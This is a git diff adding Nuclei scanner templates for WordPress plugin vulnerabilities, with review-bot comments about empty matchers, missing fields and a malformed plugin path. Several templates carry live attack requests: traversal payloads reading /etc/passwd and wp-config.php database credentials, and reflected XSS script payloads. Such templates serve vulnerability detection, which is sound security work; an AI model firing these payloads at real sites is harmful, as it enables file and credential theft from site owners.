./poc/remote_code_execution/product-input-fields-for-woocommerce-97004c16a7bb5fede3689ed987325810.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-9a3ca09635424f94d3861e1ff9bab7e9.yaml +./poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-c97944407bd399f70cfb424f4d5a0a32.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/product-input-fields-for-woocommerce-file-download.yaml @@ -117560,6 +117650,7 @@ ./poc/remote_code_execution/woocommerce-beta-tester-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-beta-tester-plugin.yaml ./poc/remote_code_execution/woocommerce-beta-tester.yaml +./poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml ./poc/remote_code_execution/woocommerce-bookings-8ea2499a6f5cac64a1ee962d3c11f8fd.yaml ./poc/remote_code_execution/woocommerce-bookings-a9ad7d62c09b1ba0f7e4148da69bef80.yaml ./poc/remote_code_execution/woocommerce-bookings.yaml 
@@ -117868,6 +117959,7 @@ ./poc/remote_code_execution/woocommerce-jetpack-d3c852a02fbabb5028922424c36af155.yaml ./poc/remote_code_execution/woocommerce-jetpack-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-jetpack-dcde8d28625b23d0598d82d5cf5c9367.yaml +./poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml ./poc/remote_code_execution/woocommerce-jetpack-e1e008ce426037ef5ae9f77edcfc6e76.yaml ./poc/remote_code_execution/woocommerce-jetpack-e2078f39da5666867ea338a19fbe40bc.yaml ./poc/remote_code_execution/woocommerce-jetpack-ea912b7f6b12b03a6471e740a2d44a8d.yaml @@ -119039,6 +119131,7 @@ ./poc/search/buddypress-global-search.yaml ./poc/search/cardoza-ajax-search-3fee688b9283108b8ce285eedf2ca99f.yaml ./poc/search/cardoza-ajax-search.yaml +./poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/search/cm-on-demand-search-and-replace-b9ef4c42066d1243c4361875af401867.yaml ./poc/search/cm-on-demand-search-and-replace-c88511895f4973dac1281187970c5197.yaml ./poc/search/cm-on-demand-search-and-replace-c930e28cc682e30a9cd848d840bf5599.yaml @@ -120627,6 +120720,7 @@ ./poc/social/twitter-plugin-73b27079a4e2a001195d157dd0684416.yaml ./poc/social/twitter-plugin-e1d9dfdea2bd6c473515cb426182f4d6.yaml ./poc/social/twitter-plugin.yaml +./poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml ./poc/social/twitter-real-time-search-scrolling-80d16706c4e400906f78635a43d8bce4.yaml ./poc/social/twitter-real-time-search-scrolling.yaml ./poc/social/twitter-secret(1).yaml 
@@ -122144,6 +122238,7 @@ ./poc/sql/CVE-2023-7199-771da08db31196eec3c07a2d74a68d47.yaml ./poc/sql/CVE-2023-7204-d9a87e6f99d8ec51bcdbc22893c28d0e.yaml ./poc/sql/CVE-2023-7287-6bfa7db55abe86e184a7874b8579256d.yaml +./poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml ./poc/sql/CVE-2024-0236-8b9db5f11cac4a929f23be7822edd92a.yaml ./poc/sql/CVE-2024-0249-33d2477db1d599b9d98c92d0bbc3fb77.yaml ./poc/sql/CVE-2024-0324-2d8d93ffa67c92b2f1ddbe0ca4721845.yaml @@ -122179,6 +122274,7 @@ ./poc/sql/CVE-2024-1049-0e66fa189b7475aa8bef5ee2db21f9f7.yaml ./poc/sql/CVE-2024-10515-5613c1285c13db3e8e7567a1d6eaba45.yaml ./poc/sql/CVE-2024-10528-eac229beaabedbff0577ee78d6ac55d8.yaml +./poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml ./poc/sql/CVE-2024-10592-5953010a8969c666bdb90006ddda2bb4.yaml ./poc/sql/CVE-2024-10627-1c85a579db4c49a8c9cbe80724b7af26.yaml ./poc/sql/CVE-2024-10647-f9db24370dab16c6bbf61c415c445725.yaml @@ -122199,8 +122295,12 @@ ./poc/sql/CVE-2024-1095-741eaa5507c75edbe90bc3ba4e40e5a9.yaml ./poc/sql/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml ./poc/sql/CVE-2024-11088-564fc5eaafcf306cc1db90950bcd86ec.yaml +./poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml ./poc/sql/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml ./poc/sql/CVE-2024-11197-b1a29e2fb93e8f055bb485dbbb4122a8.yaml +./poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml +./poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml +./poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml ./poc/sql/CVE-2024-11265-034e9ebd3db460e0c25197fe05cce744.yaml ./poc/sql/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml ./poc/sql/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml 
@@ -122278,6 +122378,7 @@ ./poc/sql/CVE-2024-2186-ddbd98614861cf0f218b059975bb059b.yaml ./poc/sql/CVE-2024-2187-bdbc8a78ef60910e9f7dca097517ab85.yaml ./poc/sql/CVE-2024-22135-aa0536d89ba0db70524ad0dec0d6fe8c.yaml +./poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml ./poc/sql/CVE-2024-22290-1189eefcf4ba1dbce161712b5603b645.yaml ./poc/sql/CVE-2024-22291-dcaac6cfae9f01312fefeb3df3e7db02.yaml ./poc/sql/CVE-2024-22294-897d97db9d7d6e87202336de8d087613.yaml @@ -122707,6 +122808,7 @@ ./poc/sql/CVE-2024-47630-88ac2fee16dbb7484715f57a922d6331.yaml ./poc/sql/CVE-2024-47633-3e9ee9fedbde18139742b8f2882ae9d4.yaml ./poc/sql/CVE-2024-47635-fdb3493fb4811f6df08d86524a5576cb.yaml +./poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml ./poc/sql/CVE-2024-47645-107ee6912b6dbf8ebc560bd5f696aa95.yaml ./poc/sql/CVE-2024-4779-2538af254bdbffcd0c4f76bfdaf81c5f.yaml ./poc/sql/CVE-2024-4789-db4647af61ca31063be76c6f44a638fb.yaml @@ -122952,6 +123054,7 @@ ./poc/sql/CVE-2024-9225-8aa496476e08c8c664db47cbf34e8cf4.yaml ./poc/sql/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml ./poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml +./poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml ./poc/sql/CVE-2024-9357-c4db257cbb3582805d4e4a79e0374022.yaml ./poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml ./poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml @@ -123723,6 +123826,7 @@ ./poc/sql/blogintroduction-wordpress-plugin-a64dfdb35a4384acb2d4d68e05f08394.yaml ./poc/sql/blogroll-fun-ac035dad8502e6d379e7796cdb889e8e.yaml ./poc/sql/blogstand-smart-banner-87540e38c0ec2adb47041929da1ff74d.yaml +./poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml ./poc/sql/bo-wc-customer-review-watson-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/boilerplate-extension-82295f02171db479d37da90a7d662e98.yaml ./poc/sql/bold-page-builder-2db59b40ea3793f152fa65740f2203eb.yaml 
@@ -123958,6 +124062,7 @@ ./poc/sql/classified-listing-203ed011f4b9c3d58db1a5549c1d1d12.yaml ./poc/sql/classified-listing-4f13524aa9e30ac6373e0dbd9053098b.yaml ./poc/sql/clean-social-icons-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml ./poc/sql/cleantalk-spam-protect-cdb8feeb356db8592e2e77f8bb1b6433.yaml ./poc/sql/click-to-top-78a86132517e0271db60a3979bd52f00.yaml ./poc/sql/clickbank-ads-clickbank-widget-39dc1dd9bed8d1dbef6e775199cd3fbb.yaml @@ -123977,9 +124082,15 @@ ./poc/sql/clover-online-orders-7cf3a21b435e40c9843db22b9b1e37b4.yaml ./poc/sql/cm-ad-changer-a7c53137049fcd26587cfb7bf3bdbc75.yaml ./poc/sql/cm-ad-changer-ad19a5f7e8dbb73d195b2498a24fc6e8.yaml +./poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/sql/cm-download-manager-3c8dbfa632b4dbfffb3c8c56d5135ce1.yaml ./poc/sql/cm-download-manager-a0341bf64b0c8b6fa11db4648bc1942e.yaml +./poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml +./poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml +./poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml +./poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/sql/cm-pop-up-banners-c6881fe258c1fa0dd33dbf550460f630.yaml +./poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/sql/cms-commander-client-76b931b6fcc8dbcb6e16d1e54df1775e.yaml ./poc/sql/cms-press-b0e8a69291b11db48d1fc51eb83e2fbf.yaml ./poc/sql/cmseasy-aid-sqli.yaml 
@@ -124656,6 +124767,7 @@ ./poc/sql/emergency-password-reset-ac5cb6bd414bb0dbceb828355bc820a8.yaml ./poc/sql/ems-sqli.yaml ./poc/sql/english-wp-admin-1be71793df056db5cf0828f5f271bdd1.yaml +./poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/sql/enhanced-tooltipglossary-cec6dde40228540cdbf61d3d987375ed.yaml ./poc/sql/enhanced-wordpress-contactform-f32b447e5b5bf42e6f6db5f314e311a2.yaml ./poc/sql/enigma-chartjs-eddbc3a06b66071ffc106682eef00a39.yaml @@ -124682,6 +124794,7 @@ ./poc/sql/error-based-sqli-post-request.yaml ./poc/sql/error-based-sqli.yaml ./poc/sql/error-log-monitor-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/error-sqli.yaml ./poc/sql/errorbased_sqli.yaml ./poc/sql/errsqli.yaml ./poc/sql/esafenet-mysql-fileread.yaml @@ -125898,6 +126011,8 @@ ./poc/sql/nocodb-panel.yaml ./poc/sql/nocodb.yaml ./poc/sql/nofollow-all-external-links-1252194ad26b032bf0693dbd1a1c47e7.yaml +./poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml +./poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml ./poc/sql/nokke-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/note-press-865f978211c1ec7412e27b5b8edb2da7.yaml ./poc/sql/notificationx-sqli.yaml @@ -127167,6 +127282,7 @@ ./poc/sql/twentyfourth-wp-scraper-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/twigify-b7de650c05254b194a03adb0bbb4b850.yaml ./poc/sql/twitter-bootstrap-slider-05618a8581e0f080dedba3ca942cc17a.yaml +./poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml ./poc/sql/twl-easy-call-44c77796893ecfe964db9f129906e241.yaml ./poc/sql/typofr-50c7a8d6d6928e0edbdd25d945accee8.yaml ./poc/sql/ubermenu-f5905ac46fc848b6b7db6aec714caee2.yaml @@ -128835,6 +128951,7 @@ ./poc/sql_injection/error-based-sqli-get-request.yaml ./poc/sql_injection/error-based-sqli-post-request.yaml ./poc/sql_injection/error-based-sqli.yaml +./poc/sql_injection/error-sqli.yaml ./poc/sql_injection/errorbased_sqli.yaml ./poc/sql_injection/errsqli.yaml ./poc/sql_injection/esafenet-mysql-fileread.yaml 
@@ -131321,6 +131438,7 @@ ./poc/web/geovision-geowebserver-xss.yaml ./poc/web/geowebcache.yaml ./poc/web/geowebserver-detector.yaml +./poc/web/geowebserver-lfi-xss.yaml ./poc/web/geowebserver-workflow.yaml ./poc/web/git-web-interface-7713.yaml ./poc/web/git-web-interface.yaml @@ -133909,6 +134027,7 @@ ./poc/wordpress/spawp-theme.yaml ./poc/wordpress/spawp.yaml ./poc/wordpress/spotify-play-button-for-wordpress-4b4b001e99a774355b7bd5a059e1bfc4.yaml +./poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml ./poc/wordpress/spotify-play-button-for-wordpress-8f895bd6afa69660832ab82d39eca53c.yaml ./poc/wordpress/spotify-play-button-for-wordpress-9def66e1fb324a1ac273bd1f22fe1128.yaml ./poc/wordpress/spotify-play-button-for-wordpress.yaml @@ -134705,6 +134824,7 @@ ./poc/wordpress/wordpress-popup-773fdf3928e22c6a993835af54bb5ecc.yaml ./poc/wordpress/wordpress-popup-8a2326cec4cb67e442bb467f62462452.yaml ./poc/wordpress/wordpress-popup-af7b7ffaf25f8475183bbd05b2992e9c.yaml +./poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml ./poc/wordpress/wordpress-popup-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wordpress-popup-d693a473f4f76eff68ed441bb8f866eb.yaml ./poc/wordpress/wordpress-popup-e6219a1478106c90fd693153d9df8d16.yaml @@ -137676,6 +137796,7 @@ ./poc/wordpress/wp-pagseguro-payments.yaml ./poc/wordpress/wp-parsidate-02752217058d19321ce6136f605f443e.yaml ./poc/wordpress/wp-parsidate-646b2fb38564e3d6ed9c0ed316a5141e.yaml +./poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml ./poc/wordpress/wp-parsidate-cd5461c298331e6088879d243a935f4e.yaml ./poc/wordpress/wp-parsidate-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-parsidate-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -140671,6 +140792,7 @@ ./poc/xss/geovision-geowebserver-xss-7600.yaml ./poc/xss/geovision-geowebserver-xss-7601.yaml ./poc/xss/geovision-geowebserver-xss.yaml +./poc/xss/geowebserver-lfi-xss.yaml ./poc/xss/global-domains-xss-7717.yaml ./poc/xss/global-domains-xss-7718.yaml ./poc/xss/global-domains-xss.yaml diff --git a/poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..8d76e8c6c3 --- /dev/null +++ b/poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-video-lesson-manager/" + google-query: inurl:"/wp-content/plugins/cm-video-lesson-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-video-lesson-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-video-lesson-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-video-lesson-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.2') \ No newline at end of file 
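Review bot: `description: >` is left empty and the `cvss-metrics`, `cvss-score` and `cve-id` entries under `classification` carry no value, while `tags` still claims `cve`; the `name` is also generic ("Multiple Plugins <= (Various Versions)") even though the `dsl` matcher pins `<= 1.8.2` for this one plugin. A reader of a finding gets no statement of what was detected or how, so fill the description with at least the facts the name already gives plus the detection method, e.g. `description: > Reflected XSS via the cminds_free_guide shortcode in CM Video Lesson Manager <= 1.8.2; detected from the readme.txt Stable tag only (version fingerprint, not a reflection check), which can differ from the code actually deployed`, and either populate the classification fields from the linked Wordfence advisory or drop `cve` from the tags. The two `version` extractors differ only by `internal: true`, so one of them is redundant. The same empty fields and the placeholder `shodan-query: 'vuln:'` appear in the boldgrid-backup template in the next hunk.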
diff --git a/poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml b/poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml
new file mode 100644
index 0000000000..8860ed5eba
--- /dev/null
+++ b/poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml
@@ -0,0 +1,59 @@
+id: boldgrid-backup-889122f13f92f4a43160426c13aa8df0
+
+info:
+ name: >
+ Total Upkeep <= 1.16.6 - Authenticated (Administrator+) Remote Code Execution via Backup Settings
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/boldgrid-backup/"
+ google-query: inurl:"/wp-content/plugins/boldgrid-backup/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,boldgrid-backup,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "boldgrid-backup"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.16.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2011-1669-2046.yaml b/poc/cve/CVE-2011-1669-2046.yaml
new file mode 100644
index 0000000000..ab577ddc1d
--- /dev/null
+++ b/poc/cve/CVE-2011-1669-2046.yaml
@@ -0,0 +1,31 @@
+id: CVE-2011-1669
+info:
+ name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
+ - https://www.exploit-db.com/exploits/17119
+ - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/
+ - http://www.exploit-db.com/exploits/17119
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2011-1669
+ metadata:
+ google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
+ tags: cve,cve2011,wordpress,wp-plugin,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/18
diff --git a/poc/cve/CVE-2011-4624-2075.yaml b/poc/cve/CVE-2011-4624-2075.yaml
new file mode 100644
index 0000000000..5ad804b793
--- /dev/null
+++ b/poc/cve/CVE-2011-4624-2075.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-4624
+
+info:
+ name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
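Review bot: The body matcher of the CVE-2011-4624 template is `- ""`, an empty string, which every response body satisfies; together with the `text/html` header match and status 200 the template would then report any reachable facebook.php as vulnerable without proving that anything is reflected. If this is what the file contains rather than a rendering artifact that stripped a `<script>` tag, the word should be the decoded form of the payload sent in the path, `- '"><script>alert(123)</script>'`, so that a match demonstrates the reflection. The CVE-2013-3526, CVE-2013-4625, CVE-2014-4592 and CVE-2014-9094 templates in the following hunks show the same empty word, and CVE-2014-4535 matches only `'>`, which is nearly as weak.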
diff --git a/poc/cve/CVE-2013-3526-2254.yaml b/poc/cve/CVE-2013-3526-2254.yaml
new file mode 100644
index 0000000000..a65162e1be
--- /dev/null
+++ b/poc/cve/CVE-2013-3526-2254.yaml
@@ -0,0 +1,30 @@
+id: CVE-2013-3526
+
+info:
+ name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+ description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2013-4625-2269.yaml b/poc/cve/CVE-2013-4625-2269.yaml
new file mode 100644
index 0000000000..18e8ab1369
--- /dev/null
+++ b/poc/cve/CVE-2013-4625-2269.yaml
@@ -0,0 +1,30 @@
+id: CVE-2013-4625
+
+info:
+ name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2014-4535-2349.yaml b/poc/cve/CVE-2014-4535-2349.yaml
new file mode 100644
index 0000000000..5d3164e594
--- /dev/null
+++ b/poc/cve/CVE-2014-4535-2349.yaml
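Review bot: The CVE-2013-4625 template has no `tags:` line, so tag-based selection (for example a run filtered on `cve2013` or `wp-plugin`) will never include it, unlike every sibling template in this commit; its `info` block also lacks a `classification` entry. Add `tags: cve,cve2013,wordpress,xss,wp-plugin` after the `reference` line and, mirroring CVE-2013-3526 and CVE-2014-4535, a `classification:` block with `cve-id: CVE-2013-4625`.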
@@ -0,0 +1,32 @@
+id: CVE-2014-4535
+info:
+ name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference:
+ - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2014-4535
+ cwe-id: CWE-79
+ description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'>"
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2014-4592-2380.yaml b/poc/cve/CVE-2014-4592-2380.yaml
new file mode 100644
index 0000000000..8644ea6f44
--- /dev/null
+++ b/poc/cve/CVE-2014-4592-2380.yaml
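Review bot: The request path spells the plugin directory with en dashes, `import–legacy–media`, whereas WordPress plugin slugs are plain ASCII and the directory is presumably `import-legacy-media`; as committed, the request targets a path that cannot exist on a real install, so the template can never produce a true positive. Replace that segment so the path reads `/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=...` and keep the rest of the query unchanged. This may have come from a word-processor substitution, but it is what the hunk contains. The `'>` body word is also too short to prove the reflection; match a longer piece of the decoded payload instead.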
@@ -0,0 +1,37 @@ +id: CVE-2014-4592 +info: + name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. + reference: + - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 + - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-4592 + cwe-id: CWE-79 + metadata: + google-query: inurl:"/wp-content/plugins/wp-planet" + tags: cve,cve2014,wordpress,wp-plugin,xss +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2014-5368-2398.yaml b/poc/cve/CVE-2014-5368-2398.yaml new file mode 100644 index 0000000000..c629fa4d25 --- /dev/null +++ b/poc/cve/CVE-2014-5368-2398.yaml 
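Review bot: The body word for the XSS check is empty (`- ""`), which every body satisfies, so the only evidence this template collects is a 200 text/html answer from magpie_debug.php. The word should be the literal reflected `<script>alert(document.domain)</script>` from the `url` parameter; if the tag was dropped when the file was rendered, confirm the committed line still carries it. A short comment on why `text/html` is required (a JSON or plain-text reflection would not execute) would also help the next reviewer.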
@@ -0,0 +1,30 @@ +id: CVE-2014-5368 +info: + name: WordPress Plugin WP Content Source Control - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-5368 + - https://www.exploit-db.com/exploits/39287 + - https://www.cvedetails.com/cve/CVE-2014-5368 + tags: cve,cve2014,wordpress,wp-plugin,lfi + classification: + cve-id: CVE-2014-5368 +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php" + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/CVE-2014-9094-2416.yaml b/poc/cve/CVE-2014-9094-2416.yaml new file mode 100644 index 0000000000..81ae8ce817 --- /dev/null +++ b/poc/cve/CVE-2014-9094-2416.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 